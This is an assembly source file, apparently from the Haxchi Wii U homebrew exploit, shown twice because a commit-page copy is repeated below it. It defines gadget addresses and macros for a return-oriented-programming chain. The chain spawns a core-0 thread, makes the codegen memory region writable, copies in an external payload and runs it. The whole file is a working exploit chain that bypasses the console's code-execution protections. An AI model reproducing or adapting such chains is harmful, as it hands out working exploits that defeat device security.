haxchi/haxchi_rop.s

MAIN_STACKTOP equ (0x30796C00)
CORE0_STACKORIG equ (0x2B566050) ; TEMP ?
CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ?
RPX_OFFSET equ (0x01800000)
COREINIT_OFFSET equ (- 0xFE3C00)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8)
BCTRL equ (RPX_OFFSET + 0x02206FBC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8)
LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)

NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
HACHI_APPLICATION_PTR equ (0x10c8c938)

OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)
OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)
OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
SYS_LAUNCHSETTINGS equ (0x03B9B25C)
_EXIT equ (0x0229a240 + RPX_OFFSET)
exit  equ (0x022924b0 + RPX_OFFSET)

OSFATAL equ (0x02015218 + COREINIT_OFFSET)

CODEGEN_ADR equ 0x01800000

NERD_THREADOBJECT equ (0x107968AC - 0x1000)

.macro set_sp,v
	.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
		.word 0xDEADBABE ; r30
		.word v ; r31
		.word 0xDEAD0001 ; garbage
	.word MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR
		.word 0xDEADBABE ; r26
		.word 0xDEADBABE ; r27
		.word 0xDEADBABE ; r28
		.word 0xDEADBABE ; r29
		.word 0xDEADBABE ; r30
		.word 0xDEADBABE ; r31
		.word 0xDEAD0001 ; garbage
	.word LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR
.endmacro

.macro call_func,f,arg1,arg2,arg3,arg4
	.word LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR
		.word 0xDEAD0001 ; garbage
		.word 0xDEADBABE ; r21
		.word 0xDEADBABE ; r22
		.word 0xDEADBABE ; r23
		.word 0xDEADBABE ; r24
		.word 0xDEADBABE ; r25
		.word 0xDEADBABE ; r26
		.word f ; r27 (ctr)
		.word arg4 ; r28 (r6)
		.word arg3 ; r29 (r5)
		.word arg2 ; r30 (r4)
		.word arg1 - 2 ; r31 (r3 - 2)
	; sp is here when LMW_R26R1x18 happens
		.word 0xDEAD0004 ; garbage
	.word MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR
		.word 0xDEAD0008 ; garbage
		.word 0xDEAD000C ; garbage
		.word 0xDEAD0010 ; garbage
		.word 0xDEAD0014 ; garbage
		.word 0xDEADBABE ; r26
		.word 0xDEADBABE ; r27
		.word 0xDEADBABE ; r28
		.word 0xDEADBABE ; r29
		.word 0xDEADBABE ; r30
		.word 0xDEADBABE ; r31
	; final sp is here
		.word 0xDEADBABE ; garbage
.endmacro

.macro call_func_6args,f,arg1,arg2,arg3,arg4,arg5,arg6
	.word LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR
		.word 0xDEAD0001 ; garbage
		.word arg6 ; r21 (r8)
		.word 0xDEADBABE ; r22
		.word 0xDEADBABE ; r23
		.word arg1 ; r24 (r3)
		.word arg2 ; r25 (r4)
		.word 0xDEADBABE ; r26
		.word arg3 ; r27 (r5)
		.word arg4 ; r28 (r6)
		.word arg5 ; r29 (r7)
		.word LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR ; r30 (ctr)
		.word 0xDEADBABE ; r31
	; sp is here when LMW_R26R1x18 happens
		.word 0xDEAD0004 ; garbage
	.word MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL
		.word 0xDEAD0001 ; garbage
		.word 0xDEADBABE ; r21
		.word 0xDEADBABE ; r22
		.word 0xDEADBABE ; r23
		.word 0xDEADBABE ; r24
		.word 0xDEADBABE ; r25
		.word 0xDEADBABE ; r26
		.word f ; r27 (ctr)
		.word arg4 ; r28 (r6)
		.word arg3 ; r29 (r5)
		.word arg2 ; r30 (r4)
		.word arg1 - 2 ; r31 (r3 - 2)
	; sp is here when LMW_R26R1x18 happens
		.word 0xDEAD0004 ; garbage
	.word MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR
		.word 0xDEAD0008 ; garbage
		.word 0xDEAD000C ; garbage
		.word 0xDEAD0010 ; garbage
		.word 0xDEAD0014 ; garbage
		.word 0xDEADBABE ; r26
		.word 0xDEADBABE ; r27
		.word 0xDEADBABE ; r28
		.word 0xDEADBABE ; r29
		.word 0xDEADBABE ; r30
		.word 0xDEADBABE ; r31
	; final sp is here
		.word 0xDEADBABE ; garbage
.endmacro


.create "haxchi_rop_hook.bin", 0x107968AC
.arm.big

rop_hook_start:

	set_sp (rop_start - 4)

.Close


.create "haxchi_rop.bin", (0xF4000000 + 0xFD2000)
.arm.big

rop_start:

	; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0

	; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
	; call_func exit, 0, 0, 0, 0
	; call_func _EXIT, 0, 0, 0, 0
	; .word _EXIT
	; .word _START_EXIT
	; 	.word 0xDEADBABE ; garbage
	; 	.word 0xDEADBABE ; garbage
	; 	.word 0xDEADBABE ; garbage
	; 	.word 0xDEADBABE ; garbage
	; 	.word 0xDEADBABE ; garbage
	call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0
	call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0
	call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0
	call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0
	call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop

	core0rop:
		; switch codegen to RW
		call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0

		; memcpy code
		call_func MEMCPY, CODEGEN_ADR, code, code_end - code, 0x0
		call_func DC_FLUSHRANGE, CODEGEN_ADR, code_end - code, 0x0, 0x0

		; switch codegen to RX
		call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0
		call_func IC_INVALIDATERANGE, CODEGEN_ADR, code_end - code, 0x0, 0x0
	
		.word CODEGEN_ADR
	core0rop_end:

	output_string:
		.ascii "haxthread"
		.byte 0x00
		.align 0x4

	thread_param:
		.word output_string
		.word 0x00800000 ; stack size
		.word 0x00000010 ; thread prio
		.halfword 0x0001 ; thread affinity (core0)

	code:
		.incbin "haxchi_code/haxchi_code.bin"
	code_end:

.Close
initial commit 2016-11-07 02:11:18 +01:00			`MAIN_STACKTOP equ (0x30796C00)`
			`CORE0_STACKORIG equ (0x2B566050) ; TEMP ?`
			`CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ?`
			`RPX_OFFSET equ (0x01800000)`
			`COREINIT_OFFSET equ (- 0xFE3C00)`
			`LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)`
			`MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8)`
			`BCTRL equ (RPX_OFFSET + 0x02206FBC)`
			`MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)`
			`LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8)`
			`LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0)`
			`LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)`
			`MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)`
			`LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)`
			`MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)`

			`NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)`
			`NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)`
			`HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)`
			`HACHI_APPLICATION_PTR equ (0x10c8c938)`

			`OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)`
			`OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)`
			`OS_FORCEFULLRELAUNCH equ (0x02019BA8 + COREINIT_OFFSET)`
			`OSCODEGEN_GETVARANGE equ (0x0201B1C0 + COREINIT_OFFSET)`
			`OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)`
			`MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)`
			`DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)`
			`IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)`
			`SYS_LAUNCHSETTINGS equ (0x03B9B25C)`
			`_EXIT equ (0x0229a240 + RPX_OFFSET)`
			`exit equ (0x022924b0 + RPX_OFFSET)`

			`OSFATAL equ (0x02015218 + COREINIT_OFFSET)`

			`CODEGEN_ADR equ 0x01800000`

			`NERD_THREADOBJECT equ (0x107968AC - 0x1000)`

			`.macro set_sp,v`
			`.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR`
			`.word 0xDEADBABE ; r30`
			`.word v ; r31`
			`.word 0xDEAD0001 ; garbage`
			`.word MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR`
			`.word 0xDEADBABE ; r26`
			`.word 0xDEADBABE ; r27`
			`.word 0xDEADBABE ; r28`
			`.word 0xDEADBABE ; r29`
			`.word 0xDEADBABE ; r30`
			`.word 0xDEADBABE ; r31`
			`.word 0xDEAD0001 ; garbage`
			`.word LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR`
			`.endmacro`

			`.macro call_func,f,arg1,arg2,arg3,arg4`
			`.word LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR`
			`.word 0xDEAD0001 ; garbage`
			`.word 0xDEADBABE ; r21`
			`.word 0xDEADBABE ; r22`
			`.word 0xDEADBABE ; r23`
			`.word 0xDEADBABE ; r24`
			`.word 0xDEADBABE ; r25`
			`.word 0xDEADBABE ; r26`
			`.word f ; r27 (ctr)`
			`.word arg4 ; r28 (r6)`
			`.word arg3 ; r29 (r5)`
			`.word arg2 ; r30 (r4)`
			`.word arg1 - 2 ; r31 (r3 - 2)`
			`; sp is here when LMW_R26R1x18 happens`
			`.word 0xDEAD0004 ; garbage`
			`.word MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR`
			`.word 0xDEAD0008 ; garbage`
			`.word 0xDEAD000C ; garbage`
			`.word 0xDEAD0010 ; garbage`
			`.word 0xDEAD0014 ; garbage`
			`.word 0xDEADBABE ; r26`
			`.word 0xDEADBABE ; r27`
			`.word 0xDEADBABE ; r28`
			`.word 0xDEADBABE ; r29`
			`.word 0xDEADBABE ; r30`
			`.word 0xDEADBABE ; r31`
			`; final sp is here`
			`.word 0xDEADBABE ; garbage`
			`.endmacro`

			`.macro call_func_6args,f,arg1,arg2,arg3,arg4,arg5,arg6`
			`.word LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR`
			`.word 0xDEAD0001 ; garbage`
			`.word arg6 ; r21 (r8)`
			`.word 0xDEADBABE ; r22`
			`.word 0xDEADBABE ; r23`
			`.word arg1 ; r24 (r3)`
			`.word arg2 ; r25 (r4)`
			`.word 0xDEADBABE ; r26`
			`.word arg3 ; r27 (r5)`
			`.word arg4 ; r28 (r6)`
			`.word arg5 ; r29 (r7)`
			`.word LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR ; r30 (ctr)`
			`.word 0xDEADBABE ; r31`
			`; sp is here when LMW_R26R1x18 happens`
			`.word 0xDEAD0004 ; garbage`
			`.word MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL`
			`.word 0xDEAD0001 ; garbage`
			`.word 0xDEADBABE ; r21`
			`.word 0xDEADBABE ; r22`
			`.word 0xDEADBABE ; r23`
			`.word 0xDEADBABE ; r24`
			`.word 0xDEADBABE ; r25`
			`.word 0xDEADBABE ; r26`
			`.word f ; r27 (ctr)`
			`.word arg4 ; r28 (r6)`
			`.word arg3 ; r29 (r5)`
			`.word arg2 ; r30 (r4)`
			`.word arg1 - 2 ; r31 (r3 - 2)`
			`; sp is here when LMW_R26R1x18 happens`
			`.word 0xDEAD0004 ; garbage`
			`.word MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR`
			`.word 0xDEAD0008 ; garbage`
			`.word 0xDEAD000C ; garbage`
			`.word 0xDEAD0010 ; garbage`
			`.word 0xDEAD0014 ; garbage`
			`.word 0xDEADBABE ; r26`
			`.word 0xDEADBABE ; r27`
			`.word 0xDEADBABE ; r28`
			`.word 0xDEADBABE ; r29`
			`.word 0xDEADBABE ; r30`
			`.word 0xDEADBABE ; r31`
			`; final sp is here`
			`.word 0xDEADBABE ; garbage`
			`.endmacro`





			`.create "haxchi_rop_hook.bin", 0x107968AC`
			`.arm.big`

			`rop_hook_start:`

			`set_sp (rop_start - 4)`

			`.Close`




			`.create "haxchi_rop.bin", (0xF4000000 + 0xFD2000)`
			`.arm.big`

			`rop_start:`

			`; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0`

			`; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0`
			`; call_func exit, 0, 0, 0, 0`
			`; call_func _EXIT, 0, 0, 0, 0`
			`; .word _EXIT`
			`; .word _START_EXIT`
			`; .word 0xDEADBABE ; garbage`
			`; .word 0xDEADBABE ; garbage`
			`; .word 0xDEADBABE ; garbage`
			`; .word 0xDEADBABE ; garbage`
			`; .word 0xDEADBABE ; garbage`
			`call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0`
			`call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0`
			`call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0`
			`call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0`
			`call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop`

			`core0rop:`
			`; switch codegen to RW`
			`call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0`

			`; memcpy code`
			`call_func MEMCPY, CODEGEN_ADR, code, code_end - code, 0x0`
			`call_func DC_FLUSHRANGE, CODEGEN_ADR, code_end - code, 0x0, 0x0`

			`; switch codegen to RX`
			`call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0`
			`call_func IC_INVALIDATERANGE, CODEGEN_ADR, code_end - code, 0x0, 0x0`

			`.word CODEGEN_ADR`
			`core0rop_end:`

			`output_string:`
			`.ascii "haxthread"`
			`.byte 0x00`
			`.align 0x4`

			`thread_param:`
			`.word output_string`
			`.word 0x00800000 ; stack size`
			`.word 0x00000010 ; thread prio`
			`.halfword 0x0001 ; thread affinity (core0)`

			`code:`
			`.incbin "haxchi_code/haxchi_code.bin"`
			`code_end:`

			`.Close`